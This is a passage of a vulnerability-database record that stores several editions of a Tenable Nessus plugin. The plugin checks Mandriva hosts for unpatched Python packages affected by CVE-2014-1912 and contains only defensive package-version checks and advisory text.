audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python-devel-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"python-docs-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.3-4.5.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandriva Linux Security Advisory : python (MDVSA-2014:041)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 7, "lastseen": "2018-09-01T23:42:26"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:mandriva:linux:tkinter", "p-cpe:/a:mandriva:linux:lib64python2.7", "cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:tkinter-apps", "p-cpe:/a:mandriva:linux:python-docs", "p-cpe:/a:mandriva:linux:python", "p-cpe:/a:mandriva:linux:lib64python-devel"], "cvelist": ["CVE-2014-1912"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "A vulnerability was reported in Python's socket module, due to a boundary error within the sock_recvfrom_into() function, which could be exploited to cause a buffer overflow. This could be used to crash a Python application that uses the socket.recvfrom_info() function or, possibly, execute arbitrary code with the permissions of the user running vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "3429f24aaf34395e4cb56f5590caf96c8a16742928eba98033d2b7447a3798c4", "hashmap": [{"hash": "750d729e31e0e44891f533ce4d0c7e34", "key": "sourceData"}, {"hash": "56a8969e704734c58918deb27219f300", "key": "pluginID"}, {"hash": "7f51b83a884bbf3dc9746fe5866c6354", "key": "description"}, {"hash": "cfc852798ae03ee34148d1cfcbb9e999", "key": "published"}, {"hash": "83dfc08c7f7afa19ea39d7f1f599a179", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "fa06f43e1ac45d37cab66d87ad17926e", "key": "href"}, {"hash": "c82db22f1c4a41616b1bb468d9808190", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "d65569ff0d86eb6e9bc945e604df846a", "key": "cvelist"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "3b32f4a483a694cfe34cf4b7c7caf1b2", "key": "title"}, {"hash": "21fc9686c146fcf6b16f09134dff3269", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=72594", "id": "MANDRIVA_MDVSA-2014-041.NASL", "lastseen": "2018-08-05T11:46:53", "modified": "2018-08-03T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.3", "pluginID": "72594", "published": "2014-02-20T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1062370", "http://bugs.python.org/issue20246"], "reporter": "Tenable", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:041. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72594);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/03 11:35:08\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_xref(name:\"MDVSA\", value:\"2014:041\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2014:041)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.python.org/issue20246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1062370\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python-devel-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"python-docs-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.3-4.5.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandriva Linux Security Advisory : python (MDVSA-2014:041)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 5, "lastseen": "2018-08-05T11:46:53"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:mandriva:linux:tkinter", "p-cpe:/a:mandriva:linux:lib64python2.7", "cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:tkinter-apps", "p-cpe:/a:mandriva:linux:python-docs", "p-cpe:/a:mandriva:linux:python", "p-cpe:/a:mandriva:linux:lib64python-devel"], "cvelist": ["CVE-2014-1912"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "A vulnerability was reported in Python's socket module, due to a boundary error within the sock_recvfrom_into() function, which could be exploited to cause a buffer overflow. This could be used to crash a Python application that uses the socket.recvfrom_info() function or, possibly, execute arbitrary code with the permissions of the user running vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "6fd60d0452687f04fb5308281dd4dd84b9c9fdd573faa255814c6f297294c75b", "hashmap": [{"hash": "30f8a3cd16450f4fae9f6381156dd10d", "key": "modified"}, {"hash": "56a8969e704734c58918deb27219f300", "key": "pluginID"}, {"hash": "7f51b83a884bbf3dc9746fe5866c6354", "key": "description"}, {"hash": "cfc852798ae03ee34148d1cfcbb9e999", "key": "published"}, {"hash": "83dfc08c7f7afa19ea39d7f1f599a179", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "fa06f43e1ac45d37cab66d87ad17926e", "key": "href"}, {"hash": "c82db22f1c4a41616b1bb468d9808190", "key": "references"}, {"hash": "a54ba23cac1969a5a4c4fc2ae60ee5cb", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "d65569ff0d86eb6e9bc945e604df846a", "key": "cvelist"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "3b32f4a483a694cfe34cf4b7c7caf1b2", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=72594", "id": "MANDRIVA_MDVSA-2014-041.NASL", "lastseen": "2017-10-29T13:36:52", "modified": "2016-05-20T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.3", "pluginID": "72594", "published": "2014-02-20T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1062370", "http://bugs.python.org/issue20246"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:041. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72594);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2016/05/20 14:12:06 $\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_xref(name:\"MDVSA\", value:\"2014:041\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2014:041)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.python.org/issue20246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1062370\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python-devel-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"python-docs-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.3-4.5.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandriva Linux Security Advisory : python (MDVSA-2014:041)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:36:52"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:mandriva:linux:tkinter", "p-cpe:/a:mandriva:linux:lib64python2.7", "cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:tkinter-apps", "p-cpe:/a:mandriva:linux:python-docs", "p-cpe:/a:mandriva:linux:python", "p-cpe:/a:mandriva:linux:lib64python-devel"], "cvelist": ["CVE-2014-1912"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "A vulnerability was reported in Python's socket module, due to a boundary error within the sock_recvfrom_into() function, which could be exploited to cause a buffer overflow. This could be used to crash a Python application that uses the socket.recvfrom_info() function or, possibly, execute arbitrary code with the permissions of the user running vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "04654fda86d49f6c7a2ae9ce23c7bface41b6483f4ebeb7f0c0f0a1db80b1858", "hashmap": [{"hash": "e2914120514a29eeccc01e381df164d8", "key": "modified"}, {"hash": "56a8969e704734c58918deb27219f300", "key": "pluginID"}, {"hash": "7f51b83a884bbf3dc9746fe5866c6354", "key": "description"}, {"hash": "cfc852798ae03ee34148d1cfcbb9e999", "key": "published"}, {"hash": "83dfc08c7f7afa19ea39d7f1f599a179", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "fa06f43e1ac45d37cab66d87ad17926e", "key": "href"}, {"hash": "c82db22f1c4a41616b1bb468d9808190", "key": "references"}, {"hash": "23bd4534de8c022889b08ee087a2312d", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "d65569ff0d86eb6e9bc945e604df846a", "key": "cvelist"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "3b32f4a483a694cfe34cf4b7c7caf1b2", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=72594", "id": "MANDRIVA_MDVSA-2014-041.NASL", "lastseen": "2018-08-02T07:47:45", "modified": "2018-07-19T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.3", "pluginID": "72594", "published": "2014-02-20T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1062370", "http://bugs.python.org/issue20246"], "reporter": "Tenable", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:041. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72594);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/19 20:59:18\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_xref(name:\"MDVSA\", value:\"2014:041\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2014:041)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.python.org/issue20246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1062370\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python-devel-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"python-docs-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.3-4.5.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandriva Linux Security Advisory : python (MDVSA-2014:041)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2018-08-02T07:47:45"}], "edition": 8, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "83dfc08c7f7afa19ea39d7f1f599a179"}, {"key": "cvelist", "hash": "d65569ff0d86eb6e9bc945e604df846a"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "4a1263ad6d16c43b58b56837514f6599"}, {"key": "href", "hash": "fa06f43e1ac45d37cab66d87ad17926e"}, {"key": "modified", "hash": "21fc9686c146fcf6b16f09134dff3269"}, {"key": "naslFamily", "hash": "526837706681051344a466f9e51ac982"}, {"key": "pluginID", "hash": "56a8969e704734c58918deb27219f300"}, {"key": "published", "hash": "cfc852798ae03ee34148d1cfcbb9e999"}, {"key": "references", "hash": "c82db22f1c4a41616b1bb468d9808190"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "750d729e31e0e44891f533ce4d0c7e34"}, {"key": "title", "hash": "3b32f4a483a694cfe34cf4b7c7caf1b2"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "39a26fdb74263ba4964beb6f08eed4fb0ed1a9ebd92d3821309156480d200e85", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:041. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72594);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/03 11:35:08\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_xref(name:\"MDVSA\", value:\"2014:041\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2014:041)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.python.org/issue20246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1062370\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", 